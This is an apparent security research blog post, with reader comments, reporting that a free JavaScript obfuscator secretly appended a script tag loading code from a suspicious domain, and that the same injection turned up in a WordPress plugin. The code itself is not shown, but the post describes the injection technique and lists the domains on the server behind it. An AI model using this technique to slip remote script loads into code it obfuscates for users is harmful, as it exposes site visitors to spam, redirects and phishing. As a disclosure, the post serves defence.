Why A Free Obfuscator Is Not Always Free.

We all love our code but some of us love it so much that we don’t want anyone else to read or understand it. When you think about it, that’s understandable – hours and hours of hard dev work, days of testing and weeks (months?, years?) of fixing bugs and after all of this, someone steals, changes or modifies your hard work.

To address these concerns, many developers will obfuscate their code.

Obfuscating Your Code

You’ve got your code, you love it, and you want to protect it. You are not able to use a premium obfuscator, and so revert to a free obfuscator. There are many available to us, for us as developers our focus is to ensure our work can’t be easily ripped off.

You employ one of the several free obfuscators, copy&paste your script and the result looks great!:

DescriptionText

You take this garbled, unreadable text, copy it to your site (or your client’s website) and all seems well. Everything works as expected. In a few days, weeks, or months, strange spam starts to appear on your website.

You leverage all the latest tools, run the greatest scans in the world, but nothing is amiss. You can’t find the culprit.

Validating by Deobfuscating

I recently had such a scenario on a clients website. My colleague, Bruno Zanelatto, pushed a case to us in the Research group with the exact characteristics described above. At first, I thought, “it’s just a false positive”, but after a closer look, I found things to be everything but okay.

My focus turned to the elements I couldn’t see – the obfuscated code. Everything else was looking good, the database was fine, and the code base for the application was fine. It took approximately 5 seconds to deobfuscate the code, I add that as a note to developers to demonstrate that obfuscation is not as safe as some might believe it to be.

The script itself was a food recipe generator but in the end, I noticed something strange:

DescriptionText

The original legitimate script was really obfuscated and added to the site source, but what’s this appendChild thing? For that url (I crafted some requests which looked as if they were coming from the real site, but it returned empty content). This was very curious, I had to understand where that appendChild was coming from and what it was doing. This forced my attention to the obfuscator itself to understand how it was doing it’s work.

This rendered some interesting findings.

After checking the service, I noticed that when obfuscating one of my scripts the obfuscator would add this to my script:

DescriptionText

I intentionally commented out the original script and related document.write (I got this whole block after two layers of deobfuscations). What’s not commented out is a code that has nothing to do with the codebase. The authors of this service (htmlobfuscator.com) are appending their code to the existing codebase.

In the original case, it pointed to their domain. In this second case, the code generated on their site pointed to another (very suspicious) domain: jqueryapi.info. I was not able to get anything by crafting a series of requests, but this is not uncommon. This doesn’t mean they can’t return such requests at any other time. Those responses can vary as well, including infection of your website with spam, malicious redirect, phishing or any number of nefarious actions.

In Bad Company

After some more digging, I noticed, there are other domains hosted on the same server. And the names speak for themselves:

april-broker.com (error when resolivng the name)
crmsys.ru (requires login to display anything)
htmlobfuscator.com (our malicious obfuscator)
htmlobfuscator.info (obfuscator clone)
javascript-obfuscator.info (obfuscator clone)
javascriptcompressor.info (obfuscator clone)
javascriptcrambler.com (obfuscator clone)
javascriptobfuscate.com (obfuscator clone)
javascriptobfuscator.info (obfuscator clone)
jqueryapi.info (empty page)
myobfuscate.com (obfuscator clone)
obfuscatorjavascript.com (obfuscator clone)
obfuscatorjavascript.info (obfuscator clone)
phptds.com (error when resolving the name)
promebel21.ru (error when resolving the name)
softtradelab.com (ad-network offering own ad-system and networks… what a surprise!)

We leveraged VirusTotal to parse through these domains and get more information, the results were not surprising:

DescriptionText

Widespread Use of Malicious Obfuscators

During my research, it turned out, that this free obfuscator seems to be widely used! Based on the original infected file name, I realized that it was also part of a legitimate WordPress plugin – Simple Converter (and it might not be the only one):

DescriptionText

The last year when this plugin was updated was 2013, and the author evidently used a free service to obfuscate his code. A code which he loved, he developed and which he wanted to protect and serve for free. Well, nowadays, almost nothing is truly free.

Keep your eyes open and stay safe!

7 comments
  1. Howdy!

    We *do not* allow obfuscated code on the WordPress.org plugin directory. Ever. For any case, whether it is security related or not.

    This is actually mentioned in our detailed guidelines, but I’m just going to quote that bit here so everybody can see it:

    > “4. No obfuscated code. We believe that obfuscated code violates the spirit, if not the letter, of the GPL license under which we operate. The GPL specifically states “The source code for a work means the preferred form of the work for making modifications to it.” Intentionally obfuscated code is not the preferred form, and not allowed in the repository under any circumstances. However, note that some systems, like Paypal donation buttons, use encoded code as part of their normal operating mechanism. This is not considered to be “obfuscated” as this is simply how these types of systems operate and it is not a choice by the plugin author. These types of things are acceptable, but may result in the author being questioned about it for edge cases. If a non-encoded method for such services is available, use it.”

    We do take our guidelines very seriously, and we remove plugins from the directory when we are informed of violations of those guidelines. You can always report any perceived violation directly to our review team by emailing us at plugins@wordpress.org. Please do report these issues.

    This isn’t even about security, as such. Obfuscated code is a big no-no for us, and while we cannot check every checkin to the repository, we do take strong action when we know an issue exists.

    It would have been nice if you had told us about the problem so that we could get it solved on our end, prior to your blog post.

  2. Great article. Pretty clever technique to surreptitiously place malware code on to inconspicuous’ users websites, uncovered.

  3. The included script tag is quite clever indeed. The developers who obfuscate their javascript, not so much.

    It’s trivial to deobfuscate JS as it still has to be in a format the browser understands, so best case it’s not really obfuscated but minimized, and if it is somehow obfuscated whatever is used to deobfuscate it would still need to be included in the clientside code, and is freely available.

    People who do this don’t realize their code probably isn’t worth anything anyway, and If you’re that worried someone is going to steal your code, you should probably keep it to yourself, which is going to be hard with clientside code.

  4. Hey @Otto4242:disqus

    You’re right, we honestly didn’t even think of the .org guidelines or whether it was in or out of line with them. We were more fascinated by what was being done, little to do with .org or the platform. Will keep that in mind for the future.

    All the best

    Tony

  5. Frankly, using an obfuscator (whether free or paid, ‘legitimate’ or malicious) is a terrible idea anyway. It only inconveniences your users (page files to load, cannot monkeypatch a bug, …), whereas it does approximately nothing against somebody who wants to use your code for their own profit – after all, they have a financial incentive, and breaking an obfuscator is trivial, especially if there’s money to be earned by doing so.

    It won’t stop those you’re trying to stop.

Comments are closed.

You May Also Like